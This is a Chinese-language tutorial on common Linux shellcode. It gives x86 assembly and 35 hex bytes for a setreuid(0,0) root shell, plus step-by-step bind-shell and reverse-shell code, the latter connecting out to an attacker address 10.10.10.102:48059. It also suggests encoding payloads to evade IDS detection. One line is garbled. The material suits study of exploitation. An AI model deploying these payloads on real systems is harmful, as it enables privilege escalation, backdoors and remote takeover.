Linux 常见shellode

 

对于初期接触网络安全的人来说，Shellcode 是很神秘的东西，对于网络攻击过程中的嗅探信息、漏洞剖析都是可以理解的，但真正利用漏洞入侵时，通过把一段二进制码送入后并执行，就可以获得目标机器的控制权，之后的事情是属于爱好者学习技术，还是黑客的行为，就看攻击者的一念之差了。Shellcode 就好象神秘的武器，安全防护变得如此不堪一击。Shellcode 究竟是什么样的程序？是什么特殊代码？如何才能学会编写？我下面收集了几类常见的Shellcode ，主要是学习使用。它其实也是一般的软件程序，主要是因为二进制码的“不可读性”，增加了神秘色彩。

 

Shellcode 是指能完成特殊任务的自包含的二进制代码，根据不同的任务可能是发出一条系统调用或建立一个高权限的Shell ，Shellcode 也就由此得名。它的最终目的是取得目标机器的控制权，所以一般被攻击者利用系统的漏洞送入系统中执行，从而获取特殊权限的执行环境，或给自己设立有特权的帐户。Shellcode 因操作系统有一些差异，这里以Linux 为例。

Shellcode 是一段高技巧的软件代码，为了小而精，一般直接写为16 进制的操作码，当然编写者一般采用C 或汇编编写，然后通过汇编程序成为16 进制的操作码。

 

1 、获取特殊权限 ：攻击的目标通常是某个SUID( 具有高权限的系统程序) 程序，因为它可以具有较高的特权去执行一些命令( 比如修口令等) ，好的SUID 程序会在不必要时放弃过高的特权，需要时再重新设置获取特权。Setreuid 是用来设置( 恢复) 进程的真实和有效的用户ID 。当然也就可以设置root(0) 的权限。

xor ebx,ebx      参数一：真实用户id(ruid)=0

xor ecx,ecx      参数二：有效用户id(euid)=0

xor eax,eax

mov al,0x46      系统调用0x46

int 0x80         设置setreuid(0,0)

有了root(0) 用户权限，系统基本就归你指挥了。

 

2 、执行/bin/sh ： 有了特权，还要有个“工作室”，shell 是Linux 常用的控制台，取得一个有特权的shell ，就可以让你“随意”工作了。建立一个shell 并不复杂，一般采用execve 调用执行/bin/sh 软件

char *shell[2] ；

 shell[0]=”/bin/sh”;

 shell[1]=0;

execve(shell[0],shell,NULL);

该调用C 语言编写很简单，对应的汇编代码也不复杂：

xor eax,eax          eax=0

push eax             eax=null

push 0x68732f2f      压栈 //sh

push 0x6e69622f      压栈 /bin

mov ebx,esp          ebx=esp 指向/bin/sh

push eax             eax=null  结束栈null

push ebx             参数2   ebx 指向/bin/sh

mov ecx,esp          参数3   ecx 指向[“/bin/sh”,NULL]

xor edx,edx           参数4  edx=NULL

mov al,0xb             参数1  eax=0xb

int 0x80

 

综合以上两个部分，就是最常见的Shellcode 了，具体生成的16 进制代码如下( 共35 个字节) ：

\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80             ;setreuid(0,0)

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1

\x31\xd2\xb0\x0b\xcd\x80                           ; /bin/sh

root(0) shell

Shellcode SQL Shellcode Shellcode Shell

 

3 、绑定到端口的Shellcode

用shellcode 在目标计算机上打开一个端口( 通讯服务) ，并将Shell 绑定到该端口，攻击者可以放弃入侵时的用的端口，等于在目标机器上建立了系统的后门。该端口可以为入侵者随时建立连接，因为是打开了shell ，所以等于建立远程控制目标的控制台。

开启服务离不开Socket ，Socket 定义为一个端口和一个IP 到一个进程的绑定。

a) 建立本地IP Socket ，TCP

 int server

 server=socket(2,1,0)

b) 用IP 和端口建立一个Sockaddr_in 结构

 struct sockaddr_in server_addr

    server_addr.sin_addr.s_addr=0         socket 的地址设为本地地址

    server_addr.sin_port=0xBBBB         socket 的端口设为0xBBBB=48059

    server_addr.sin_family=2              协议族为IP

c) 将端口和IP 绑定到Socket 上

 bind(server, (struct sockaddr *)&server_addr, 0x10)

d) 以监听模式启动socket ：打开端口并等待连接

 listen(server, 0)

e) 有连接时，向客户返回一个句柄

 int client

client=accept(server, 0, 0)

f) 将返回的句柄，复制到stdin 、stdout 、stderr ，shell 输出到攻击者(client) 的屏幕

 dup2(client,0)

 dup2(client,1)

 dup2(client,2)

g) 调用普通的execve 执行shellcode

 char *shell[2] ；

shell[0]=”/bin/sh”

    shell[1]=0

execve(shell[0], shell, 0)

 

4 、反向连接的shellcode

当目标计算机在防火墙后时，防火墙不允许外边的计算机主动访问目标机器。所以即使采用上边的shellcode 建立了服务后门，你还是不能与目标计算机建立连接。反向连接的含义就是，让目标计算机通过特定的IP( 攻击者的) 和端口反向连接到攻击者，也可以设定为在固定的时间段主动来建立连接。

很多木马就利用这种方式，主动连接带木马的管理者，“神不知，鬼不觉”地把目标计算机加入到某个“僵尸网络”的黑社会团伙中。

a) 建立本地IP Socket ，TCP

 int soc

 soc=socket(2,1,0)

b) 用IP 和端口建立一个Sockaddr_in 结构

 struct sockaddr_in server_addr

    server_addr.sin_addr.s_addr=0x660A0A0A   socket 的地址设为10.10.10.102

    server_addr.sin_port=0xBBBB             socket 的端口设为0xBBBB=48059

    server_addr.sin_family=2                 协议族为IP

c) 建立反向连接connect

 int remote

remote=connect(soc, (struct sockaddr*)&server_addr, 0x10)

d) 将socket 复制到stdin 、stdout 、stderr ，shell 输出到攻击者的屏幕

 dup2(soc,0)

 dup2(soc,1)

 dup2(soc,2)

e) 调用普通的execve 执行shellcode

 char *shell[2] ；

shell[0]=”/bin/sh”

    shell[1]=0

execve(shell[0], shell, 0)

注意：10.10.10.102 为防火墙外攻击机器的地址，此时在该机器上要启动一个监听48059 端口的服务

 

5 、躲避IDS 的过滤

由于经典的Shellcode 并不是有很多的版本，大多数人员都是采用同样的Shellcode ，很少有人自己编写。所以IDS 厂商把常见的Shellcode 的指纹提取出来，作为验证攻击行为的“特征”，很多攻击行为就暴露在IDS 的监控之下，网络管理人员可以很快知道你到了他的网络内部，进而采取“捕获”措施。

所以，隐藏指纹，变换代码，Shellcode 也在不断更新。技术很多，这里就不例举了，提一个有意思的思路：因为Shellcode 的基本功能相同，都是诱使目标机器执行这些指令，目标代码在传输和存放时是很容易被IDS 或系统察觉的，那么直到被执行前才恢复原来面貌是一个好注意。所以有人通过把代码简单移位，“加密”后的代码没有任何“意义”，到执行前再反向移位，被检测到的概率就小多了，这种方式对躲避IDS 是很有效果的。